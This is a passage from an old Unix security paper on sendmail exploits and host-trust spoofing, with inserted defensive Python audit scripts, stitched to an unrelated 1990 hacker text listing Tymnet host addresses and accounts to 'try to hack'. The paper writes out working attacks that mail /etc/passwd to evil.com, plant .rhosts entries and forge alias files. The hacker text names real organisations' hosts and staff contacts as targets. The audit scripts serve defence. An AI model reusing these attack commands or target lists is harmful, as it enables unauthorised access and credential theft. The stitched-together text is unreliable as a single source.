filesystem and network utilities, for it can compromise your system as
surely as a “+” in your hosts.equiv or a passwordless (root) account.

----

Next, you examine sendmail. Sendmail is a very complex program that has
a long history of security problems, including the infamous “wiz”
command (hopefully long since disabled on all machines). You can often
determine the OS, sometimes down to the version number, of the target,
by looking at the version number returned by sendmail. This, in turn,
can give you hints as to how vulnerable it might be to any of the
numerous bugs. In addition, you can see if they run the “decode” alias,
which has its own set of problems:

evil % telnet victim.com 25
connecting to host victim.com (128.128.128.1.), port 25
connection open
220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit

Running the “decode” alias is a security risk — it allows potential
attackers to overwrite any file that is writable by the owner of that
alias — often daemon, but potentially any user. Consider this piece of
mail — this will place “evil.com” in user zen’s .rhosts file if it is
writable:

evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com
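
To find a "decode" alias, or any other alias that hands mail to a program or a file, on your own mail host, the alias source can be parsed directly. This is an added example, not part of sendmail or COPS; the function names and the sample alias file are constructed for illustration.

```python
"""Audit sendmail alias definitions for entries that run programs or
write files. Added example; not part of sendmail or COPS."""

# Constructed sample /etc/aliases.
ALIASES = '''\
# system aliases
postmaster: root
decode: "|/usr/bin/uudecode"
staff: zen, sam,
    root
archive: /var/spool/mail.archive
lists: :include:/usr/local/lib/lists/members
'''


def split_targets(rhs):
    """Split an alias right-hand side on commas that are outside quotes."""
    targets, buf, quoted = [], [], False
    for ch in rhs:
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            targets.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    targets.append("".join(buf).strip())
    return [t for t in targets if t]


def parse_aliases(text):
    """Return {alias: [targets]}, honouring comments and continuation lines."""
    aliases, current = {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and current is not None:
            rhs = raw                      # continuation of the previous alias
        else:
            name, sep, rhs = raw.partition(":")
            if not sep:
                continue                   # not an alias definition
            current = name.strip().lower()
            aliases.setdefault(current, [])
        aliases[current].extend(split_targets(rhs))
    return aliases


def audit_aliases(text):
    """Return sorted (alias, severity, detail) findings."""
    findings = []
    for alias, targets in parse_aliases(text).items():
        for target in targets:
            if target.startswith("|"):
                program = target[1:].strip()
                if alias == "decode" or "uudecode" in program:
                    findings.append((alias, "HIGH",
                                     "mail is piped to uudecode, so the "
                                     "sender picks the file that is written"))
                else:
                    findings.append((alias, "REVIEW",
                                     "mail is piped to a program: " + program))
            elif target.startswith("/"):
                findings.append((alias, "REVIEW",
                                 "mail is appended to file " + target))
            elif target.startswith(":include:"):
                findings.append((alias, "REVIEW",
                                 "members are read from %s; check who can "
                                 "write it" % target[len(":include:"):]))
    return sorted(findings)


if __name__ == "__main__":
    for alias, severity, detail in audit_aliases(ALIASES):
        print("%-8s %-6s %s" % (alias, severity, detail))
```

The compiled aliases.pag and aliases.dir files should be checked alongside the source, since sendmail reads those, not the text file.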

If no home directories are known or writable, an interesting variation
of this is to create a bogus /etc/aliases.pag file that contains an
alias with a command you wish to execute on your target. This may work
since on many systems the aliases.pag and aliases.dir files, which
control the system’s mail aliases, are writable to the world.

evil % cat decode
bin: "| cat /etc/passwd | mail zen@evil.com"
evil % newaliases -oQ/tmp -oA`pwd`/decode
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victim.com
evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null

A lot of things can be found out by just asking sendmail if an address
is acceptable (vrfy), or what an address expands to (expn). When the
finger or rusers services are turned off, vrfy and expn can still be
used to identify user accounts or targets. Vrfy and expn can also be
used to find out if the user is piping mail through any program that
might be exploited (e.g. vacation, mail sorters, etc.).

It can be a good idea to disable the vrfy and expn commands: in most
versions, look at the source file srvrsmtp.c, and either delete or
change the two lines in the CmdTab structure that have the strings
"vrfy" and "expn". Sites without source can still disable expn and vrfy
by just editing the sendmail executable with a binary editor and
replacing "vrfy" and "expn" with blanks. Acquiring a recent version of
sendmail (see Appendix D) is also an extremely good idea, since there
have probably been more security bugs reported in sendmail than in any
other UNIX program.

----

As a sendmail-sendoff, there are two fairly well known bugs that should
be checked into. The first was definitely fixed in version 5.59 from
Berkeley; despite the messages below, for versions of sendmail previous
to 5.59, the "evil.com" gets appended, despite the error messages, along
with all of the typical mail headers, to the file specified:

% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
evil.com
.
quit
EOSM

evil % /bin/sh evil_sendmail
Trying 128.128.128.1
Connected to victim.com
Escape character is '^]'.
Connection closed by foreign host.

evil % rlogin victim.com -l zen
Welcome to victim.com!
victim %

The second hole, fixed only recently, permitted anyone to specify
arbitrary shell commands and/or pathnames for the sender and/or
destination address.
Attempts to keep details secret were in vain, and extensive discussions
in mailing lists and usenet news groups led to disclosure of how to
exploit some versions of the bug. As with many UNIX bugs, nearly every
vendor's sendmail was vulnerable to the problem, since they all share a
common source code tree ancestry. Space precludes us from discussing
it fully, but a typical attack to get the password file might look like
this:

evil % telnet victim.com 25
Trying 128.128.128.1...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail zen@evil.com < /etc/passwd"
250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
evil %

At the time of writing, version 8.6.4 of sendmail (see Appendix D for
information on how to get this) is reportedly the only variant of
sendmail with all of the recent security bugs fixed.

Trust
-----

For our final topic of vulnerability, we'll digress from the practical
strategy we've followed previously to go a bit more into the
theoretical side, and briefly discuss the notion of trust. The issues
and implications of vulnerabilities here are a bit more subtle and
far-reaching than what we've covered before; in the context of this
paper we use the word trust whenever there is a situation when a server
(note that any host that allows remote access can be called a server)
can permit a local resource to be used by a client without password
authentication when password authentication is normally required. In
other words, we arbitrarily limit the discussion to clients in
disguise.

There are many ways that a host can trust: .rhosts and hosts.equiv
files that allow access without password verification; window servers
that allow remote systems to use and abuse privileges; export files
that control access via NFS, and more.

Nearly all of these rely on client IP address to hostname conversion to
determine whether or not service is to be granted. The simplest method
uses the /etc/hosts file for a direct lookup. However, today most
hosts use either DNS (the Domain Name Service), NIS, or both for name
lookup service. A reverse lookup occurs when a server has an IP
address (from a client host connecting to it) and wishes to get the
corresponding client hostname.

Although the concept of how host trust works is well understood by most
system administrators, the _dangers_ of trust, and the _practical_
problem it represents, irrespective of hostname impersonation, is one
of the least understood problems we know of on the Internet. This goes
far beyond the obvious hosts.equiv and rhosts files; NFS, NIS,
windowing systems -- indeed, many of the useful services in UNIX are
based on the concept that well known (to an administrator or user)
sites are trusted in some way. What is not understood is how
networking so tightly binds security between what are normally
considered disjoint hosts.

Any form of trust can be spoofed, fooled, or subverted, especially when
the authority that gets queried to check the credentials of the client
is either outside of the server's administrative domain, or when the
trust mechanism is based on something that has a weak form of
authentication; both are usually the case.

Obviously, if the host containing the database (either NIS, DNS, or
whatever) has been compromised, the intruder can convince the target
host that s/he is coming from any trusted host; it is now sufficient to
find out which hosts are trusted by the target.
This task is often greatly helped by examining where system
administrators and system accounts (such as root, etc.) last logged in
from. Going back to our target, victim.com, you note that root and
some other system accounts logged in from big.victim.com. You change
the PTR record for evil.com so that when you attempt to rlogin from
evil.com to victim.com, victim.com will attempt to look up your
hostname and will find what you placed in the record. If the record in
the DNS database looks like:

1.192.192.192.in-addr.arpa IN PTR evil.com

And you change it to:

1.192.192.192.in-addr.arpa IN PTR big.victim.com

then, depending on how naive victim.com's system software is,
victim.com will believe the login comes from big.victim.com, and,
assuming that big.victim.com is in the /etc/hosts.equiv or /.rhosts
files, you will be able to log in without supplying a password. With
NIS, it is a simple matter of either editing the host database on the
NIS master (if this is controlled by the intruder) or of spoofing or
forcing NIS (see discussion on NIS security above) to supply the target
with whatever information you desire. Although more complex,
interesting, and damaging attacks can be mounted via DNS, time and
space don't allow coverage of these methods here.

Two methods can be used to prevent such attacks. The first is the most
direct, but perhaps the most impractical. If your site doesn't use any
trust, you won't be as vulnerable to host spoofing. The other strategy
is to use cryptographic protocols. Using the secure RPC protocol (used
in secure NFS, NIS+, etc.) is one method; although it has been "broken"
cryptographically, it still provides better assurance than RPC
authentication schemes that do not use any form of encryption. Other
solutions, both hardware (smartcards) and software (Kerberos), are
being developed, but they are either incomplete or require changes to
system software.
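
How "naive" the server's software is comes down to whether it checks the name a PTR record hands back. The sketch below is an added example, not code from the paper: it sets the naive decision beside one that forward-resolves the returned name and requires the client address among the results. The address given to big.victim.com and all helper names are constructed for illustration.

```python
"""Forward-confirmed reverse lookup for hosts.equiv-style trust (added example)."""
import ipaddress
import socket


def norm(name):
    """Canonical form of a host name for comparison."""
    return name.strip().rstrip(".").lower()


class TableResolver:
    """Offline resolver backed by constructed PTR and A tables."""

    def __init__(self, ptr, a):
        self.ptr = {ipaddress.ip_address(k): list(v) for k, v in ptr.items()}
        self.a = {norm(k): list(v) for k, v in a.items()}

    def reverse(self, ip):
        return self.ptr.get(ipaddress.ip_address(ip), [])

    def forward(self, name):
        return self.a.get(norm(name), [])


class SystemResolver:
    """Same interface on top of the host's real resolver."""

    def reverse(self, ip):
        try:
            name, aliases, _addrs = socket.gethostbyaddr(ip)
        except OSError:              # no PTR record or lookup failure
            return []
        return [name, *aliases]

    def forward(self, name):
        try:
            infos = socket.getaddrinfo(name, None)
        except OSError:
            return []
        return sorted({info[4][0] for info in infos})


def naive_trust(client_ip, trusted, resolver):
    """The naive server: believe whatever name the PTR record supplies."""
    wanted = {norm(t) for t in trusted}
    return any(norm(n) in wanted for n in resolver.reverse(client_ip))


def confirmed_trust(client_ip, trusted, resolver):
    """Trust a PTR name only if its own address records list the client.

    Returns (decision, reason).
    """
    ip = ipaddress.ip_address(client_ip)
    wanted = {norm(t) for t in trusted}
    names = [norm(n) for n in resolver.reverse(client_ip)]
    if not names:
        return False, "no PTR record"
    reason = "PTR name is not a trusted host"
    for name in names:
        if name not in wanted:
            continue
        addrs = set()
        for text in resolver.forward(name):
            try:
                addrs.add(ipaddress.ip_address(text))
            except ValueError:       # e.g. scoped IPv6 literal; cannot match
                continue
        if ip in addrs:
            return True, f"{name} resolves back to {ip}"
        reason = f"{name} does not resolve to {ip}: PTR/A mismatch"
    return False, reason


# Constructed sample data. The first PTR entry is the altered record from
# the text; the address of big.victim.com is an assumption.
TRUSTED_HOSTS = {"big.victim.com"}       # as listed in /etc/hosts.equiv
SAMPLE_PTR = {
    "192.192.192.1": ["big.victim.com"],
    "128.128.128.2": ["big.victim.com"],
}
SAMPLE_A = {"big.victim.com": ["128.128.128.2"]}


def demo():
    """Map each client address to (naive decision, confirmed decision)."""
    resolver = TableResolver(SAMPLE_PTR, SAMPLE_A)
    return {
        ip: (naive_trust(ip, TRUSTED_HOSTS, resolver),
             confirmed_trust(ip, TRUSTED_HOSTS, resolver))
        for ip in ("192.192.192.1", "128.128.128.2", "10.9.8.7")
    }


if __name__ == "__main__":
    for ip, (naive, (ok, why)) in demo().items():
        print(f"{ip:15} naive={naive!s:5} confirmed={ok!s:5} {why}")
```

The forward check only moves the trust to whoever controls the forward zone and the resolver path, so it narrows the problem described here rather than replacing the two methods that follow.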

Appendix B details the results of an informal survey taken from a
variety of hosts on the Internet.

Protecting the system
---------------------

It is our hope that we have demonstrated that even some of the most
seemingly innocuous services run can offer (sometimes unexpectedly)
ammunition to determined system crackers. But, of course, if security
were all that mattered, computers would never be turned on, let alone
hooked into a network with literally millions of potential intruders.
Rather than reiterating specific advice on what to switch on or off, we
instead offer some general suggestions:

o If you cannot turn off the finger service, consider installing a
  modified finger daemon. It is rarely necessary to reveal a user's
  home directory and the source of last login.

o Don't run NIS unless it's absolutely necessary. Use NFS as little
  as possible.

o Never export NFS filesystems unrestricted to the world. Try to
  export file systems read-only where possible.

o Fortify and protect servers (e.g. hosts that provide a service to
  other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative
  accounts on these hosts.

o Examine carefully services offered by inetd and the portmapper.
  Eliminate any that aren't explicitly needed. Use Wietse Venema's
  inetd wrappers, if for no other reason than to log the sources of
  connections to your host. This adds immeasurably to the standard
  UNIX auditing features, especially with respect to network attacks.
  If possible, use the loghost mechanism of syslog to collect
  security-related information on a secure host.

o Eliminate trust unless there is an absolute need for it. Trust is
  your enemy.

o Use shadow passwords and a passwd command that disallows poor
  passwords. Disable or delete unused/dormant system or user accounts.

o Keep abreast of current literature (see our suggested reading list
  and bibliography at the end of this paper) and security tools;
  communicate to others about security problems and incidents.
  At minimum, subscribe to the CERT mailing list and phrack magazine
  (plus the firewalls mailing list, if your site is using or thinking
  about installing a firewall) and read the usenet security newsgroups
  to get the latest information on security problems. Ignorance is
  the deadliest security problem we are aware of.

o Install all vendor security patches as soon as possible, on all of
  your hosts. Examine security patch information for other vendors -
  many bugs (rdist, sendmail) are common to many UNIX variants.

It is interesting to note that common solutions to security problems
such as running Kerberos or using one-time passwords or digital tokens
are ineffective against most of the attacks we discuss here. We
heartily recommend the use of such systems, but be aware that they are
_not_ a total security solution -- they are part of a larger struggle
to defend your system.

Conclusions
-----------

Perhaps none of the methods shown here are surprising; when writing
this paper, we didn't learn very much about how to break into systems.
What we _did_ learn was, while testing these methods out on our own
systems and that of friendly sites, just how effective this set of
methods is for gaining access to a typical (UNIX) Internet host.
Tiring of trying to type these in all by hand, and desiring to keep our
own systems more secure, we decided to implement a security tool
(SATAN) that attempts to check remote hosts for at least some of the
problems discussed here. The typical response, when telling people
about our paper and our tool was something on the order of "that sounds
pretty dangerous -- I hope you're not going to give it out to
everybody. But since you can trust me, may I have a copy of it?"

We never set out to create a cookbook or toolkit of methods and
programs on how to break into systems -- instead, we saw that these
same methods were being used, every day, against ourselves and against
friendly system administrators.
We believe that by propagating information that normally wasn't
available to those outside of the underworld, we can increase security
by raising awareness. Trying to restrict access to "dangerous"
security information has never seemed to be a very effective method for
increasing security; indeed, the opposite appears to be the case, since
the system crackers have shown little reticence to share their
information with each other.

While it is almost certain that some of the information presented here
is new material to (aspiring) system crackers, and that some will use
it to gain unauthorized entrance onto hosts, the evidence presented
even by our ad hoc tests shows that there is a much larger number of
insecure sites, simply because the system administrators don't know any
better -- they aren't stupid or slow, they simply are unable to spend
the very little free time that they have to explore all of the security
issues that pertain to their systems. Combine that with no easy access
to this sort of information and you have poorly defended systems. We
(modestly) hope that this paper will provide badly-needed data on how
systems are broken into, and further, to explain _why_ certain steps
should be taken to secure a system. Knowing why something is a problem
is, in our opinion, the real key to learning and to making an informed,
intelligent choice as to what security really means for your site.

----

Appendix A:

SATAN (Security Analysis Tool for Auditing Networks)

Originally conceived some years ago, SATAN is actually the prototype of
a much larger and more comprehensive vision of a security tool. In its
current incarnation, SATAN remotely probes and reports various bugs and
weaknesses in network services and windowing systems, as well as
detailing as much generally useful information as possible about the
target(s). It then processes the data with a crude filter and what
might be termed an expert system to generate the final security
analysis.
While not particularly fast, it is extremely modular and easy to
modify.

SATAN consists of several sub-programs, each of which is an executable
file (perl, shell, compiled C binary, whatever) that tests a host for a
given potential weakness. Adding further test programs is as simple as
putting an executable into the main directory with the extension
".sat"; the driver program will automatically execute it. The driver
generates a set of targets (using DNS and a fast version of ping
together to get "live" targets), and then executes each of the programs
over each of the targets. A data filtering/interpreting program then
analyzes the output, and lastly a reporting program digests everything
into a more readable format.

The entire package, including source code and documentation, will be
made freely available to the public, via anonymous ftp and by posting
it to one of the numerous source code groups on the Usenet.

----

Appendix B:

An informal survey conducted on about a dozen Internet sites
(educational, military, and commercial, with over 200 hosts and 40000
accounts) revealed that on the average, close to 10 percent of a site's
accounts had .rhosts files. These files averaged six trusted hosts
each; however, it was not uncommon to have well over one hundred
entries in an account's .rhosts file, and on a few occasions, the
number was over five hundred! (This is not a record one should be
proud of owning.) In addition, _every_ site directly on the internet
(one site was mostly behind a firewall) trusted a user or host at
another site -- thus, the security of the site was not under the system
administrators' direct control. The larger sites, with more users and
hosts, had a lower percentage of users with .rhosts files, but the size
of .rhosts files increased, as well as the number of trusted off-site
hosts.

Although it was very difficult to verify how many of the entries were
valid, with hostnames such as "Makefile", "Message-Id:", and
"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries,
we question the wisdom of putting a site's security in the hands of its
users. Many users (especially the ones with larger .rhosts files)
attempted to put shell-style comments in their .rhosts files, which
most UNIX systems attempt to resolve as valid host names.
Unfortunately, an attacker can then use the DNS and NIS hostname
spoofing techniques discussed earlier to set their hostname to "#" and
freely log in. This puts a great many sites at risk (at least one
major vendor ships their systems with comments in their
/etc/hosts.equiv files.)

You might think that these sites were not typical, and, as a matter of
fact, they weren't. Virtually all of the administrators knew a great
deal about security and write security programs for a hobby or
profession, and many of the sites that they worked for did either
security research or created security products. We can only guess at
what a "typical" site might look like.

----

Appendix C:

After receiving mail from a site that had been broken into from one of
our systems, an investigation was started. In time, we found that the
intruder was working from a list of ".com" (commercial) sites, looking
for hosts with easy-to-steal password files. In this case,
"easy-to-steal" referred to sites with a guessable NIS domainname and
an accessible NIS server. Not knowing how far the intruder had gotten,
it looked like a good idea to warn the sites that were in fact
vulnerable to password file theft. Of the 656 hosts in the intruder's
hit list, 24 had easy-to-steal password files -- about one in
twenty-five hosts! One third of these files contained at least one
password-less account with an interactive shell.

With a grand total of 1594 password-file entries, a ten-minute run of a
publicly available password cracker (Crack) revealed more than 50
passwords, using nothing but a low-end Sun workstation. Another 40
passwords were found within the next 20 minutes; and a root password
was found in just over an hour. The result after a few days of
cracking: five root passwords found, 19 out of 24 password files
(eighty percent) with at least one known password, and 259 of 1594 (one
in six) passwords guessed.

----

Appendix D:

How to get some free security resources on the Internet

Mailing lists:

o The CERT (Computer Emergency Response Team) advisory mailing list.
  Send e-mail to cert@cert.org, and ask to be placed on their mailing
  list.

o The Phrack newsletter. Send an e-mail message to
  phrack@well.sf.ca.us and ask to be added to the list.

o The Firewalls mailing list. Send the following line to
  majordomo@greatcircle.com:

  subscribe firewalls

o Computer Underground Digest. Send e-mail to
  tk0jut2@mvs.cso.niu.edu, asking to be placed on the list.

Free Software:

COPS (Computer Oracle and Password System) is available via anonymous
ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+.

The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl,
in pub/security.

The latest version of Berkeley sendmail is available via anonymous ftp
from ftp.cs.berkeley.edu, in ucb/sendmail.

Sources for ftpd and many other network utilities can be found in
ftp.uu.net, in packages/bsd-sources.

Source for ISS (Internet Security Scanner), a tool that remotely scans
for various network vulnerabilities, is available via anonymous ftp
from ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.

Securelib is available via anonymous ftp from ftp.uu.net, in
usenet/comp.sources.misc/volume36/securelib.

----

Bibliography:

Baldwin, Robert W., Rule Based Analysis of Computer Security,
Massachusetts Institute of Technology, June 1987.

Bellovin, Steve, Using the Domain Name System for System Break-ins,
1992 (unpublished).

Massachusetts Institute of Technology, X Window System Protocol,
Version 11, 1990.

Shimomura, Tsutomu, private communication.

Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.

----

Suggested reading:

Bellovin, Steve -- "Security Problems in the TCP/IP Protocol Suite",
Computer Communication Review 19 (2), 1989; a comment by Stephen Kent
appears in volume 19 (3), 1989.

Garfinkel, Simson and Spafford, Gene, "Practical UNIX Security",
O'Reilly and Associates, Inc., 1992.

Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
Study: Network Information Service", Computer Communication Review
22 (5) 1992.

Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
Four, Issue Forty-Three, File 14 of 27.

Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept 1993.

Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
Protocol", Purdue University, August 1993.

Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM
27 (8), 1984.

--
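
The .rhosts and hosts.equiv hazards reported in Appendix B (wildcards, "comment" lines that are looked up as host names, junk entries, off-site hosts) can be checked for mechanically. The script below is an added example, not code from the paper or from SATAN; the sample file, the local-domain argument, the issue names and the "unqualified" heuristic for names such as "Makefile" are assumptions made for illustration.

```python
"""Audit .rhosts / hosts.equiv text for the hazards in Appendix B (added example)."""
import re
from collections import Counter, namedtuple

Finding = namedtuple("Finding", "lineno entry issue detail")

# Host name syntax: dot-separated labels of letters, digits and hyphens.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"(?=.{{1,253}}\Z){LABEL}(?:\.{LABEL})*\.?")


def in_domain(host, domain):
    """True if host is the domain itself or a name inside it."""
    host, domain = host.lower().rstrip("."), domain.lower().strip(".")
    return host == domain or host.endswith("." + domain)


def audit_trust_file(text, local_domain):
    """Return a Finding for every entry that widens trust or is junk."""
    findings = []

    def flag(lineno, entry, issue, detail):
        findings.append(Finding(lineno, entry, issue, detail))

    for lineno, raw in enumerate(text.split("\n"), start=1):
        fields = raw.split()
        if not fields:
            continue
        entry = raw.strip()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None

        if host.startswith("#"):
            # No comment syntax here: the first field is looked up as a host.
            flag(lineno, entry, "comment",
                 "not a comment; first field is treated as a host name")
            continue
        if host.startswith("-"):
            continue                  # negative entry: denies, grants nothing
        if host == "+":
            flag(lineno, entry, "wildcard-host", "every host is trusted")
        elif host.startswith("+@"):
            flag(lineno, entry, "netgroup",
                 "trust delegated to a netgroup database")
        elif not HOSTNAME_RE.fullmatch(host):
            flag(lineno, entry, "malformed", "not a valid host name")
        elif "." not in host.rstrip("."):
            # Syntactically fine ("Makefile"), but not a full name.
            flag(lineno, entry, "unqualified",
                 "resolved through the local search path")
        elif not in_domain(host, local_domain):
            flag(lineno, entry, "off-site",
                 "host is outside " + local_domain)
        if user == "+":
            flag(lineno, entry, "wildcard-user",
                 "any user on that host is trusted")
    return findings


def summarize(findings):
    """Count findings per issue type."""
    return Counter(f.issue for f in findings)


# Constructed sample file, modelled on the kinds of entries the survey lists.
SAMPLE_RHOSTS = "\n".join([
    "big.victim.com",
    "big.victim.com zen",
    "# machines I log in from",
    "+",
    "friend.other.edu zen",
    "Message-Id: <constructed@example>",
    "Makefile",
    "\x03s\x01\x03i",
    "+@admins",
    "-old.victim.com",
    "big.victim.com +",
    "",
])

if __name__ == "__main__":
    for f in audit_trust_file(SAMPLE_RHOSTS, "victim.com"):
        print(f"line {f.lineno:2}: {f.issue:13} {f.entry!r} ({f.detail})")
    print(dict(summarize(audit_trust_file(SAMPLE_RHOSTS, "victim.com"))))
```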

Packet Networks I and other Tymnet Information by Digital Demon, 1990

************************************************************

PACKET NETWORKS I

written and compiled
BY

THE DIGITAL-DEMON
(C) DEC. 29, 1990

************************************************************

Well, this phile started out as a plain informational text on Tymnet. Not too long into the work I figured that I might as well make it a general thing with just the basics on Tymnet. There are many packet networks out there, but it is hard to find things on just one network. So this will be the first installment of a series on packet networks.

Included in this phile are dialups for local Tymnet numbers. It is true that they are not necessary for everyone, but they are there just in case. This phile is meant for novices to the networks, though the lists of NUAs provided will be helpful for anyone in the field. Note that from TYMNET it requires special NUIs to access anything in the 3106 DNIC, which is Tymnet.

Many networks are not accessible from others due to refusal of collect calls, lack of support by the network, or network congestion, which happens a lot between systems that have few connections between them. If you have problems with anything within this phile, please contact me on QSD and I will help you.

QSD for those that don’t know can be accessed by dialing 18002220555 (that is tymnet) entering an ‘a’ or an ‘o’ for terminal identifier (or one of the others presented within), for login type an NUI (in this case try ‘video’) and at the ‘;’ prompt type ‘208057040540’ from there you may see me on the system, if not, then write to ‘FED’ or ‘THANATOS’ in the mailing system.

USA 03106 004869
USA 03106 004898
USA 03106 004946
USA 03106 004949
USA 03106 004956 (Host) 0 – Vax,
1 – KL1,
2 – KL,
3 – IBM,
8 – VAX 2,
11 – PC1-130
USA 03106 004957 NEC SEMI-CUSTOM DESIGN CENTRE
USA 03106 005018 (Host)
USA 03106 005034 (cierr 1402)
USA 03106 005058
USA 03106 005062 UIS SUPPB=MQDIRNET
USA 03106 005080
USA 03106 005082 COMPAQ
USA 03106 005107
USA 03106 005119 (Host)
USA 03106 005124 OPERATIONAL INFO SYSTEM VAX
USA 03106 005136 ** to be investogated **
USA 03106 005224 (Host)
USA 03106 005229 UNI.OF PENCILVANIA SCHOOL OF ARTS AND SCIENCE
USA 03106 005267 CHANEL 01
USA 03106 005320 (Host) US DIGMAL COMPUTER SERVICES
USA 03106 005433
USA 03106 005438
USA 03106 005453
USA 03106 005463 VM/370
USA 03106 005528 STRATUS/32
USA 03106 005531 STRATUS/32
USA 03106 005539 VA II/730
USA 03106 005564 STRATUS/32
USA 03106 005566 Host sys A,1 – 3M TRAC SERVICE system ALICE
B,2 – 3M TRAC SERVICE system BAMBI
3 – 3M TRAC SERVICE system CHIP
4 – 3M TRAC SERVICE system DALE
5 – 3M TRAC SERVICE system ELLIOT
6 – 3M TRAC SERVICE system FLOWER
12,7 – 3M TRAC SERVICE system GRUMPY
8 – TRAC CLUSTER VIRGO, SYSTEM HAPPY
9 – TRAC CLUSTER VIRGO, SYSTEM ISABEL
10 – TRAC CLUSTER VIRGO, SYSTEM JUMBO
11 – TRAC CLUSTER VIRGO, SYSTEM KANGA
13 – VAX
18 – DIGITAL ETHERNET
28 – unknown
31 – CIERR 1402
32 – CIERR 1402
33 – CIERR 1402
34 – CIERR 1402
35 – CIERR 1402
36 – unknown
37 – CIERR 1402
38 – unknown
40 – CPU-STP-A
41 – CIERR 1402
43 – UNKNOWN
44 – ATLAS VAX
45 – FAXON INFO SERVICE
46 – ELECTRICAL PRODUCTS
LABORATORY VASX II/750
47,48,49 – unknown
52 – SERC COMPUTER RESOURCES VAX
53 – unknown
54 – SERC COMPUTER RESOURCES VAX
55 – BDS UNIX
81,61 – TRAC CLUSTER LIBRA system LADY
62 – TRAC CLUSTER LIBRA system MICKEY
63 – TRAC CLUSTER GEMINI system NEMO
64 – TRAC CLUSTER GEMINI system OWL
65 – TRAC CLUSTER LIBRA system PLUTO
67 – TRAC CLUSTER GEMINI system QUASAR
68 – unknown
70 – TRAC TIMESHARING VAX
71 – TRAC TIMESHARING VAX
72 – TRACE TIMESHARING VAX
73 – DIGITAL ETHERNET TERMINAL SERVER
74 – TRAC TIMESHARING VAX
76 – TRAC TIMESHARING VAX
81 – TRAC TIMESHARING VAX
USA 03106 005569 STRATUS/32
USA 03106 005571 STRATUS/32
USA 03106 005603 (Host) systems 1,2,3,4,5,C (5=Outdial)
USA 03106 005622
USA 03106 005683 TECHNICAL SUPPORT PRODUCTIONS
USA 03106 005697
USA 03106 005702 AUTH
USA 03106 005704 SPOOL
USA 03106 005705
USA 03106 005706
USA 03106 005707
USA 03106 005708 IFPSE
USA 03106 005709 IFPSE
USA 03106 005711 IFXMP
USA 03106 005712
USA 03106 005725 PRIMENET
USA 03106 005744 (Cierr 1402)
USA 03106 005755 Host system, active links = A,B,C,E,F,H,G,I,
J,K,L,M,O,P,Q,R,
S,T,U,V,W,X,Y,Z
USA 03106 005758 SEI/MUS SYSTEM
USA 03106 005805
USA 03106 005818 CORPORATE MANAGEMENT INFO SYSTEMS
USA 03106 005846 (Host)
USA 03106 005897
USA 03106 005903
USA 03106 005941
USA 03106 005969 PLESSEY SEMICONDUCTORS-IRVINE
USA 03106 005984 CREDIT AGRICOLE-USA
USA 03106 006019 PRIMENET
USA 03106 006046
USA 03106 006093 NALCO CHEMICAL COMPANY NETWORK
USA 03106 006121 CORPORATE MANAGEMENT INFO SERVICE
USA 03106 006187
USA 03106 006190 CLEVELAND
USA 03106 006191
USA 03106 006227
USA 03106 006251
USA 03106 006281 EDCS
USA 03106 006283 EDCS
USA 03106 006296
USA 03106 006432 EASYLINK
USA 03106 006434 EASYLINK
USA 03106 006440
USA 03106 006590 US CENTRA SERVICE
USA 03106 006597
USA 03106 006686
USA 03106 006722 INTERNATIONAL NETWORK
USA 03106 006828
USA 03106 006832 A&A DATANET (SYSTEMS 1,8,0,14)
USA 03106 006833 (GO AWAY)
USA 03106 006834
USA 03106 006835 TOC
USA 03106 006867 DATABILITY TIMESHARING SYSTEM II
USA 03106 006994
USA 03106 007028
USA 03106 007103
USA 03106 007177
USA 03106 007272 (CIERR 1402)
USA 03106 007351 PRIMENET
USA 03106 007352 PRIMENET
USA 03106 007377
USA 03106 007596 (Host) A – VM/370, B – VM/370
USA 03106 007640

Software, South Africa………………………0655011101207
RUB Univ. of Bochum…………………………….026245234040194
ALTHH Altos Computer Systems Hamburg, West Germany…..026245400050233
ALTGER Altos Computer Systems Munich, West Germany……026245890040004
TCHH Teletex & Computer Hamburg, West Germany………026245400050570
OIS Markt & Technik Munich, West Germany………….026245890010006
RMI RMI Datentechnik Aachen, West Germany…………026245241090832

At all systems, except RUB, you may log in as “guest”.

—————————————-

Try to hack these TymNet accounts:

monitor
operator
tape
telephone
outdial
paper
t.lloy03
come


These are Dialcom regional office phone numbers:

New York NY (212) 947-7995 Manager Virginia Marshalek
Houston/San Francisco (713) 690-6311
Chicago (312) 694-2536
Washington DC (301) 770-4280

Their Telex (or as they call it XMAIL) service is pretty nifty. It offers both telex and TWX links as well as hardcopy services via Mailgramme and cablegramme. Also each XMAIL user has a unique Telex address and not a common address with your user code having to be entered in the first line of the text. (Anyone out there know of any other telex service which offers users an individual unique telex number?)

Here are some of their NUAs: DNIC is 3106
System 50 301 222
System 51 301 240
System 52 301 243
System 57 301 241
I believe however that they have simplified matters and that you can now use 301 3xx – where xx is the system number (I have not tried this).
